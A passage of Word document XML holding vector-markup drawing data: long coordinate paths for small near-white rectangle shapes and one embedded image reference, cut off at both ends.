7114,7498,7117,7498,7120,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7499,7123,7499,7123,7499,7123,7499,7123,7499,7123,7499,7123,7500,7123,7500,7123,7500,7123,7500,7123,7501,7123,7501,7123,7501,7123,7502,7123,7502,7123,7503,7123,7503,7123,7504,7123,7504,7123,7505,7123,7505,7123,7506,7123,7507,7123,7507,7123,7508,7123,7509,7123,7510,7123,7511,7123,7512,7123,7513,7123,7513,7123,7515,7123,7516,7123,7517,7123,7518,7123,7519,7123,7520,7123,7522,7123,7523,7123,7524,7123,7526,7123,7527,7123,7529,7123,7530,7123,7532,7123,7534,7123,7536,7123,7537,7123,7539,7123,7541,7123,7543,7123,7545,7123,7548,7123,7550,7123,7552,7123,7554,7123,7557,7123,7559,7123,7562,7123,7564,7123,7567,7123,7570,7123,7572,7123,7575,7123,7578,7123,7581,7123,7584,7123,7588,7123,7591,7123,7594,7123,7597,7123,7601,7123,7605,7123,7608,7123,7612,7123,7616,7123,7620,7123,7624,7123,7628,7123,7632,7123,7636,7123,7640,7123,7645,7123,7649,7123,7654,7123,7658,7123,7663,7123,7668,7123,7673,7123,7678,7123,7683,7123,7688,7123,7694,7123,7699,7123,7705,7123,7710,7123,7716,7123,7722,7123,7728,7123,7734,7123,7740,7123,7747,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7121,7753,7121,7753,7121,7753,7121,7753,7121,7753,7121,7753,7120,7753,7120,7753,7120,7753,7120,7753,7120,7753,7119,7753,7119,7753,7119,7753,7118,7753,7118,7753,7118,7753,7117,7753,7117,7753,7117,7753,7116,7753,7116,7753,7115,7753,7115,7753,7114,7753,7114,7753,7113,7753,7113,7753,7112,7753,7111,7753,7111,7753,7110,7753,7109,7753,7109,7753,7108,7753,7107,7753,7106,7753,7106,7753,7105,7753,7104,7753,7103,7753,7102,7753,7101,7753,7100,7753,7099,7753,7098,7753,7097,7753,7096,7753,7095,7753,7094,7753,7093,7753,7091,7753,7090,7753,7089,7753,7087,7753,7086,7753,7085,7753,7083,7753,7082,7753,7080,7753,7079,7753,7077,7753,7076,7753,7074,7753,7072,7753,7071,7753,7069,7753,7067,7753,7065,7753,7063,7753,7062,7753,7060,7753,7058,7753,7056,7753,7053,7753,7051,7753,7049,7753,7047,7753,7045,7753,7042,7753,7040,7753,7038,7753,7035,7753,7033,7753,7030,7753,7028,7753,7025,7753,7022,7753,7020,7753,7017,7753,7014,7753,7011,7753,7008,7753,7006,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7751,7003,7751,7003,7751,7003,7751,7003,7750,7003,7750,7003,7750,7003,7749,7003,7749,7003,7748,7003,7748,7003,7747,7003,7747,7003,7746,7003,7746,7003,7745,7003,7745,7003,7744,7003,7743,7003,7742,7003,7742,7003,7741,7003,7740,7003,7739,7003,7738,7003,7737,7003,7736,7003,7735,7003,7734,7003,7733,7003,7732,7003,7730,7003,7729,7003,7728,7003,7726,7003,7725,7003,7723,7003,7722,7003,7720,7003,7719,7003,7717,7003,7715,7003,7713,7003,7711,7003,7709,7003,7707,7003,7705,7003,7703,7003,7701,7003,7699,7003,7696,7003,7694,7003,7692,7003,7689,7003,7686,7003,7684,7003,7681,7003,7678,7003,7675,7003,7672,7003,7669,7003,7666,7003,7663,7003,7660,7003,7657,7003,7653,7003,7650,7003,7646,7003,7643,7003,7639,7003,7635,7003,7631,7003,7627,7003,7623,7003,7619,7003,7615,7003,7610,7003,7606,7003,7602,7003,7597,7003,7592,7003,7587,7003,7583,7003,7578,7003,7573,7003,7567,7003,7562,7003,7557,7003,7551,7003,7546,7003,7540,7003,7534,7003,7529,7003,7523,7003,7517,7003,7510,7003,7504,7003,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:7470;width:130;height:270" coordorigin="7110,7470" coordsize="130,270" path="m7123,7498l7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7124,7498,7124,7498,7124,7498,7124,7498,7124,7498,7124,7498,7125,7498,7125,7498,7125,7498,7125,7498,7125,7498,7126,7498,7126,7498,7126,7498,7126,7498,7127,7498,7127,7498,7127,7498,7128,7498,7128,7498,7129,7498,7129,7498,7130,7498,7130,7498,7130,7498,7131,7498,7131,7498,7132,7498,7133,7498,7133,7498,7134,7498,7134,7498,7135,7498,7136,7498,7136,7498,7137,7498,7138,7498,7139,7498,7140,7498,7140,7498,7141,7498,7142,7498,7143,7498,7144,7498,7145,7498,7146,7498,7147,7498,7148,7498,7149,7498,7150,7498,7151,7498,7153,7498,7154,7498,7155,7498,7156,7498,7158,7498,7159,7498,7160,7498,7162,7498,7163,7498,7165,7498,7166,7498,7168,7498,7170,7498,7171,7498,7173,7498,7175,7498,7176,7498,7178,7498,7180,7498,7182,7498,7184,7498,7186,7498,7188,7498,7190,7498,7192,7498,7194,7498,7196,7498,7198,7498,7200,7498,7203,7498,7205,7498,7207,7498,7210,7498,7212,7498,7215,7498,7217,7498,7220,7498,7223,7498,7225,7498,7228,7498,7231,7498,7234,7498,7237,7498,7240,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7499,7243,7499,7243,7499,7243,7499,7243,7499,7243,7499,7243,7500,7243,7500,7243,7500,7243,7500,7243,7501,7243,7501,7243,7501,7243,7502,7243,7502,7243,7503,7243,7503,7243,7504,7243,7504,7243,7505,7243,7505,7243,7506,7243,7507,7243,7507,7243,7508,7243,7509,7243,7510,7243,7511,7243,7512,7243,7513,7243,7513,7243,7515,7243,7516,7243,7517,7243,7518,7243,7519,7243,7520,7243,7522,7243,7523,7243,7524,7243,7526,7243,7527,7243,7529,7243,7530,7243,7532,7243,7534,7243,7536,7243,7537,7243,7539,7243,7541,7243,7543,7243,7545,7243,7548,7243,7550,7243,7552,7243,7554,7243,7557,7243,7559,7243,7562,7243,7564,7243,7567,7243,7570,7243,7572,7243,7575,7243,7578,7243,7581,7243,7584,7243,7588,7243,7591,7243,7594,7243,7597,7243,7601,7243,7605,7243,7608,7243,7612,7243,7616,7243,7620,7243,7624,7243,7628,7243,7632,7243,7636,7243,7640,7243,7645,7243,7649,7243,7654,7243,7658,7243,7663,7243,7668,7243,7673,7243,7678,7243,7683,7243,7688,7243,7694,7243,7699,7243,7705,7243,7710,7243,7716,7243,7722,7243,7728,7243,7734,7243,7740,7243,7747,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7241,7753,7241,7753,7241,7753,7241,7753,7241,7753,7241,7753,7240,7753,7240,7753,7240,7753,7240,7753,7239,7753,7239,7753,7239,7753,7238,7753,7238,7753,7238,7753,7237,7753,7237,7753,7237,7753,7236,7753,7236,7753,7235,7753,7235,7753,7234,7753,7234,7753,7233,7753,7233,7753,7232,7753,7231,7753,7231,7753,7230,7753,7229,7753,7229,7753,7228,7753,7227,7753,7226,7753,7226,7753,7225,7753,7224,7753,7223,7753,7222,7753,7221,7753,7220,7753,7219,7753,7218,7753,7217,7753,7216,7753,7215,7753,7214,7753,7213,7753,7211,7753,7210,7753,7209,7753,7208,7753,7206,7753,7205,7753,7203,7753,7202,7753,7200,7753,7199,7753,7197,7753,7196,7753,7194,7753,7192,7753,7191,7753,7189,7753,7187,7753,7185,7753,7183,7753,7182,7753,7180,7753,7178,7753,7176,7753,7174,7753,7171,7753,7169,7753,7167,7753,7165,7753,7163,7753,7160,7753,7158,7753,7155,7753,7153,7753,7150,7753,7148,7753,7145,7753,7143,7753,7140,7753,7137,7753,7134,7753,7131,7753,7129,7753,7126,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7751,7123,7751,7123,7751,7123,7751,7123,7750,7123,7750,7123,7750,7123,7749,7123,7749,7123,7748,7123,7748,7123,7747,7123,7747,7123,7746,7123,7746,7123,7745,7123,7745,7123,7744,7123,7743,7123,7742,7123,7742,7123,7741,7123,7740,7123,7739,7123,7738,7123,7737,7123,7736,7123,7735,7123,7734,7123,7733,7123,7732,7123,7730,7123,7729,7123,7728,7123,7726,7123,7725,7123,7723,7123,7722,7123,7720,7123,7719,7123,7717,7123,7715,7123,7713,7123,7711,7123,7709,7123,7707,7123,7705,7123,7703,7123,7701,7123,7699,7123,7696,7123,7694,7123,7692,7123,7689,7123,7686,7123,7684,7123,7681,7123,7678,7123,7675,7123,7672,7123,7669,7123,7666,7123,7663,7123,7660,7123,7657,7123,7653,7123,7650,7123,7646,7123,7643,7123,7639,7123,7635,7123,7631,7123,7627,7123,7623,7123,7619,7123,7615,7123,7610,7123,7606,7123,7602,7123,7597,7123,7592,7123,7587,7123,7583,7123,7578,7123,7573,7123,7567,7123,7562,7123,7557,7123,7551,7123,7546,7123,7540,7123,7534,7123,7529,7123,7523,7123,7517,7123,7510,7123,7504,7123,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:493.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9870,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:9870;top:7470;width:130;height:270" coordorigin="9870,7470" coordsize="130,270" path="m9884,7498l9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9886,7498,9886,7498,9886,7498,9886,7498,9886,7498,9887,7498,9887,7498,9887,7498,9887,7498,9888,7498,9888,7498,9888,7498,9889,7498,9889,7498,9889,7498,9890,7498,9890,7498,9890,7498,9891,7498,9891,7498,9892,7498,9892,7498,9893,7498,9893,7498,9894,7498,9895,7498,9895,7498,9896,7498,9896,7498,9897,7498,9898,7498,9899,7498,9899,7498,9900,7498,9901,7498,9902,7498,9903,7498,9904,7498,9904,7498,9905,7498,9906,7498,9907,7498,9908,7498,9909,7498,9911,7498,9912,7498,9913,7498,9914,7498,9915,7498,9917,7498,9918,7498,9919,7498,9920,7498,9922,7498,9923,7498,9925,7498,9926,7498,9928,7498,9929,7498,9931,7498,9933,7498,9934,7498,9936,7498,9938,7498,9939,7498,9941,7498,9943,7498,9945,7498,9947,7498,9949,7498,9951,7498,9953,7498,9955,7498,9957,7498,9960,7498,9962,7498,9964,7498,9966,7498,9969,7498,9971,7498,9974,7498,9976,7498,9979,7498,9981,7498,9984,7498,9987,7498,9990,7498,9992,7498,9995,7498,9998,7498,10001,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7499,10004,7499,10004,7499,10004,7499,10004,7499,10004,7499,10004,7500,10004,7500,10004,7500,10004,7500,10004,7501,10004,7501,10004,7501,10004,7502,10004,7502,10004,7503,10004,7503,10004,7504,10004,7504,10004,7505,10004,7505,10004,7506,10004,7507,10004,7507,10004,7508,10004,7509,10004,7510,10004,7511,10004,7512,10004,7513,10004,7513,10004,7515,10004,7516,10004,7517,10004,7518,10004,7519,10004,7520,10004,7522,10004,7523,10004,7524,10004,7526,10004,7527,10004,7529,10004,7530,10004,7532,10004,7534,10004,7536,10004,7537,10004,7539,10004,7541,10004,7543,10004,7545,10004,7548,10004,7550,10004,7552,10004,7554,10004,7557,10004,7559,10004,7562,10004,7564,10004,7567,10004,7570,10004,7572,10004,7575,10004,7578,10004,7581,10004,7584,10004,7588,10004,7591,10004,7594,10004,7597,10004,7601,10004,7605,10004,7608,10004,7612,10004,7616,10004,7620,10004,7624,10004,7628,10004,7632,10004,7636,10004,7640,10004,7645,10004,7649,10004,7654,10004,7658,10004,7663,10004,7668,10004,7673,10004,7678,10004,7683,10004,7688,10004,7694,10004,7699,10004,7705,10004,7710,10004,7716,10004,7722,10004,7728,10004,7734,10004,7740,10004,7747,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10002,7753,10002,7753,10002,7753,10002,7753,10002,7753,10001,7753,10001,7753,10001,7753,10001,7753,10000,7753,10000,7753,10000,7753,9999,7753,9999,7753,9999,7753,9998,7753,9998,7753,9998,7753,9997,7753,9997,7753,9996,7753,9996,7753,9995,7753,9995,7753,9994,7753,9993,7753,9993,7753,9992,7753,9992,7753,9991,7753,9990,7753,9989,7753,9989,7753,9988,7753,9987,7753,9986,7753,9985,7753,9984,7753,9984,7753,9983,7753,9982,7753,9981,7753,9980,7753,9979,7753,9977,7753,9976,7753,9975,7753,9974,7753,9973,7753,9972,7753,9970,7753,9969,7753,9968,7753,9966,7753,9965,7753,9963,7753,9962,7753,9960,7753,9959,7753,9957,7753,9955,7753,9954,7753,9952,7753,9950,7753,9949,7753,9947,7753,9945,7753,9943,7753,9941,7753,9939,7753,9937,7753,9935,7753,9933,7753,9931,7753,9928,7753,9926,7753,9924,7753,9922,7753,9919,7753,9917,7753,9914,7753,9912,7753,9909,7753,9907,7753,9904,7753,9901,7753,9898,7753,9896,7753,9893,7753,9890,7753,9887,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7751,9884,7751,9884,7751,9884,7751,9884,7750,9884,7750,9884,7750,9884,7749,9884,7749,9884,7748,9884,7748,9884,7747,9884,7747,9884,7746,9884,7746,9884,7745,9884,7745,9884,7744,9884,7743,9884,7742,9884,7742,9884,7741,9884,7740,9884,7739,9884,7738,9884,7737,9884,7736,9884,7735,9884,7734,9884,7733,9884,7732,9884,7730,9884,7729,9884,7728,9884,7726,9884,7725,9884,7723,9884,7722,9884,7720,9884,7719,9884,7717,9884,7715,9884,7713,9884,7711,9884,7709,9884,7707,9884,7705,9884,7703,9884,7701,9884,7699,9884,7696,9884,7694,9884,7692,9884,7689,9884,7686,9884,7684,9884,7681,9884,7678,9884,7675,9884,7672,9884,7669,9884,7666,9884,7663,9884,7660,9884,7657,9884,7653,9884,7650,9884,7646,9884,7643,9884,7639,9884,7635,9884,7631,9884,7627,9884,7623,9884,7619,9884,7615,9884,7610,9884,7606,9884,7602,9884,7597,9884,7592,9884,7587,9884,7583,9884,7578,9884,7573,9884,7567,9884,7562,9884,7557,9884,7551,9884,7546,9884,7540,9884,7534,9884,7529,9884,7523,9884,7517,9884,7510,9884,7504,9884,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:499.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9990,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:9990;top:7470;width:130;height:270" coordorigin="9990,7470" coordsize="130,270" path="m10004,7498l10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10006,7498,10006,7498,10006,7498,10006,7498,10006,7498,10007,7498,10007,7498,10007,7498,10007,7498,10008,7498,10008,7498,10008,7498,10009,7498,10009,7498,10009,7498,10010,7498,10010,7498,10011,7498,10011,7498,10011,7498,10012,7498,10012,7498,10013,7498,10013,7498,10014,7498,10015,7498,10015,7498,10016,7498,10017,7498,10017,7498,10018,7498,10019,7498,10019,7498,10020,7498,10021,7498,10022,7498,10023,7498,10024,7498,10025,7498,10025,7498,10026,7498,10027,7498,10028,7498,10030,7498,10031,7498,10032,7498,10033,7498,10034,7498,10035,7498,10037,7498,10038,7498,10039,7498,10041,7498,10042,7498,10043,7498,10045,7498,10046,7498,10048,7498,10049,7498,10051,7498,10053,7498,10054,7498,10056,7498,10058,7498,10060,7498,10061,7498,10063,7498,10065,7498,10067,7498,10069,7498,10071,7498,10073,7498,10075,7498,10077,7498,10080,7498,10082,7498,10084,7498,10087,7498,10089,7498,10091,7498,10094,7498,10096,7498,10099,7498,10101,7498,10104,7498,10107,7498,10110,7498,10112,7498,10115,7498,10118,7498,10121,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7499,10124,7499,10124,7499,10124,7499,10124,7499,10124,7499,10124,7500,10124,7500,10124,7500,10124,7500,10124,7501,10124,7501,10124,7501,10124,7502,10124,7502,10124,7503,10124,7503,10124,7504,10124,7504,10124,7505,10124,7505,10124,7506,10124,7507,10124,7507,10124,7508,10124,7509,10124,7510,10124,7511,10124,7512,10124,7513,10124,7513,10124,7515,10124,7516,10124,7517,10124,7518,10124,7519,10124,7520,10124,7522,10124,7523,10124,7524,10124,7526,10124,7527,10124,7529,10124,7530,10124,7532,10124,7534,10124,7536,10124,7537,10124,7539,10124,7541,10124,7543,10124,7545,10124,7548,10124,7550,10124,7552,10124,7554,10124,7557,10124,7559,10124,7562,10124,7564,10124,7567,10124,7570,10124,7572,10124,7575,10124,7578,10124,7581,10124,7584,10124,7588,10124,7591,10124,7594,10124,7597,10124,7601,10124,7605,10124,7608,10124,7612,10124,7616,10124,7620,10124,7624,10124,7628,10124,7632,10124,7636,10124,7640,10124,7645,10124,7649,10124,7654,10124,7658,10124,7663,10124,7668,10124,7673,10124,7678,10124,7683,10124,7688,10124,7694,10124,7699,10124,7705,10124,7710,10124,7716,10124,7722,10124,7728,10124,7734,10124,7740,10124,7747,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10122,7753,10122,7753,10122,7753,10122,7753,10122,7753,10121,7753,10121,7753,10121,7753,10120,7753,10120,7753,10120,7753,10120,7753,10119,7753,10119,7753,10118,7753,10118,7753,10118,7753,10117,7753,10117,7753,10116,7753,10116,7753,10115,7753,10115,7753,10114,7753,10113,7753,10113,7753,10112,7753,10112,7753,10111,7753,10110,7753,10109,7753,10109,7753,10108,7753,10107,7753,10106,7753,10105,7753,10105,7753,10104,7753,10103,7753,10102,7753,10101,7753,10100,7753,10099,7753,10098,7753,10096,7753,10095,7753,10094,7753,10093,7753,10092,7753,10090,7753,10089,7753,10088,7753,10086,7753,10085,7753,10083,7753,10082,7753,10080,7753,10079,7753,10077,7753,10076,7753,10074,7753,10072,7753,10070,7753,10069,7753,10067,7753,10065,7753,10063,7753,10061,7753,10059,7753,10057,7753,10055,7753,10053,7753,10051,7753,10048,7753,10046,7753,10044,7753,10042,7753,10039,7753,10037,7753,10034,7753,10032,7753,10029,7753,10027,7753,10024,7753,10021,7753,10019,7753,10016,7753,10013,7753,10010,7753,10007,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7751,10004,7751,10004,7751,10004,7751,10004,7750,10004,7750,10004,7750,10004,7749,10004,7749,10004,7748,10004,7748,10004,7747,10004,7747,10004,7746,10004,7746,10004,7745,10004,7745,10004,7744,10004,7743,10004,7742,10004,7742,10004,7741,10004,7740,10004,7739,10004,7738,10004,7737,10004,7736,10004,7735,10004,7734,10004,7733,10004,7732,10004,7730,10004,7729,10004,7728,10004,7726,10004,7725,10004,7723,10004,7722,10004,7720,10004,7719,10004,7717,10004,7715,10004,7713,10004,7711,10004,7709,10004,7707,10004,7705,10004,7703,10004,7701,10004,7699,10004,7696,10004,7694,10004,7692,10004,7689,10004,7686,10004,7684,10004,7681,10004,7678,10004,7675,10004,7672,10004,7669,10004,7666,10004,7663,10004,7660,10004,7657,10004,7653,10004,7650,10004,7646,10004,7643,10004,7639,10004,7635,10004,7631,10004,7627,10004,7623,10004,7619,10004,7615,10004,7610,10004,7606,10004,7602,10004,7597,10004,7592,10004,7587,10004,7583,10004,7578,10004,7573,10004,7567,10004,7562,10004,7557,10004,7551,10004,7546,10004,7540,10004,7534,10004,7529,10004,7523,10004,7517,10004,7510,10004,7504,10004,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:468.600pt;width:467.400pt;height:102.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId25" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:632.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,12650" coordsize="130,250">
        <v:shape style="position:absolute;left:1950;top:12650;width:130;height:250" coordorigin="1950,12650" coordsize="130,250" path="m1975,12660l1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1977,12660,1977,12660,1977,12660,1977,12660,1977,12660,1978,12660,1978,12660,1978,12660,1978,12660,1979,12660,1979,12660,1979,12660,1980,12660,1980,12660,1980,12660,1981,12660,1981,12660,1981,12660,1982,12660,1982,12660,1983,12660,1983,12660,1984,12660,1984,12660,1985,12660,1986,12660,1986,12660,1987,12660,1988,12660,1988,12660,1989,12660,1990,12660,1990,12660,1991,12660,1992,12660,1993,12660,1994,12660,1995,12660,1995,12660,1996,12660,1997,12660,1998,12660,1999,12660,2000,12660,2002,12660,2003,12660,2004,12660,2005,12660,2006,12660,2008,12660,2009,12660,2010,12660,2011,12660,2013,12660,2014,12660,2016,12660,2017,12660,2019,12660,2020,12660,2022,12660,2024,12660,2025,12660,2027,12660,2029,12660,2030,12660,2032,12660,2034,12660,2036,12660,2038,12660,2040,12660,2042,12660,2044,12660,2046,12660,2048,12660,2051,12660,2053,12660,2055,12660,2057,12660,2060,12660,2062,12660,2065,12660,2067,12660,2070,12660,2072,12660,2075,12660,2078,12660,2081,12660,2083,12660,2086,12660,2089,12660,2092,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12662,2095,12662,2095,12662,2095,12662,2095,12662,2095,12663,2095,12663,2095,12663,2095,12664,2095,12664,2095,12664,2095,12665,2095,12665,2095,12666,2095,12666,2095,12667,2095,12667,2095,12668,2095,12669,2095,12669,2095,12670,2095,12671,2095,12672,2095,12672,2095,12673,2095,12674,2095,12675,2095,12676,2095,12677,2095,12678,2095,12679,2095,12680,2095,12682,2095,12683,2095,12684,2095,12686,2095,12687,2095,12688,2095,12690,2095,12691,2095,12693,2095,12695,2095,12696,2095,12698,2095,12700,2095,12702,2095,12704,2095,12706,2095,12708,2095,12710,2095,12712,2095,12715,2095,12717,2095,12719,2095,12722,2095,12724,2095,12727,2095,12729,2095,12732,2095,12735,2095,12738,2095,12741,2095,12744,2095,12747,2095,12750,2095,12753,2095,12757,2095,12760,2095,12764,2095,12767,2095,12771,2095,12774,2095,12778,2095,12782,2095,12786,2095,12790,2095,12794,2095,12799,2095,12803,2095,12807,2095,12812,2095,12816,2095,12821,2095,12826,2095,12831,2095,12836,2095,12841,2095,12846,2095,12851,2095,12856,2095,12862,2095,12867,2095,12873,2095,12879,2095,12885,2095,12891,2095,12897,2095,12903,2095,12909,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2093,12916,2093,12916,2093,12916,2093,12916,2093,12916,2092,12916,2092,12916,2092,12916,2092,12916,2091,12916,2091,12916,2091,12916,2090,12916,2090,12916,2090,12916,2089,12916,2089,12916,2089,12916,2088,12916,2088,12916,2087,12916,2087,12916,2086,12916,2086,12916,2085,12916,2084,12916,2084,12916,2083,12916,2083,12916,2082,12916,2081,12916,2080,12916,2080,12916,2079,12916,2078,12916,2077,12916,2076,12916,2075,12916,2075,12916,2074,12916,2073,12916,2072,12916,2071,12916,2070,12916,2068,12916,2067,12916,2066,12916,2065,12916,2064,12916,2063,12916,2061,12916,2060,12916,2059,12916,2057,12916,2056,12916,2054,12916,2053,12916,2051,12916,2050,12916,2048,12916,2047,12916,2045,12916,2043,12916,2041,12916,2040,12916,2038,12916,2036,12916,2034,12916,2032,12916,2030,12916,2028,12916,2026,12916,2024,12916,2022,12916,2019,12916,2017,12916,2015,12916,2013,12916,2010,12916,2008,12916,2005,12916,2003,12916,2000,12916,1998,12916,1995,12916,1992,12916,1990,12916,1987,12916,1984,12916,1981,12916,1978,12916,1975,12916,1975,12916,1975,12916,1975,12916,1975,12916,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12914,1975,12914,1975,12914,1975,12914,1975,12914,1975,12913,1975,12913,1975,12913,1975,12913,1975,12912,1975,12912,1975,12911,1975,12911,1975,12911,1975,12910,1975,12910,1975,12909,1975,12908,1975,12908,1975,12907,1975,12907,1975,12906,1975,12905,1975,12904,1975,12903,1975,12903,1975,12902,1975,12901,1975,12900,1975,12899,1975,12898,1975,12897,1975,12895,1975,12894,1975,12893,1975,12892,1975,12890,1975,12889,1975,12887,1975,12886,1975,12884,1975,12883,1975,12881,1975,12879,1975,12878,1975,12876,1975,12874,1975,12872,1975,12870,1975,12868,1975,12866,1975,12864,1975,12861,1975,12859,1975,12857,1975,12854,1975,12852,1975,12849,1975,12846,1975,12844,1975,12841,1975,12838,1975,12835,1975,12832,1975,12829,1975,12826,1975,12823,1975,12819,1975,12816,1975,12812,1975,12809,1975,12805,1975,12801,1975,12798,1975,12794,1975,12790,1975,12786,1975,12782,1975,12777,1975,12773,1975,12769,1975,12764,1975,12760,1975,12755,1975,12750,1975,12745,1975,12740,1975,12735,1975,12730,1975,12725,1975,12719,1975,12714,1975,12708,1975,12703,1975,12697,1975,12691,1975,12685,1975,12679,1975,12673,1975,12667,1975,12660e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:632.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,12650" coordsize="130,250">
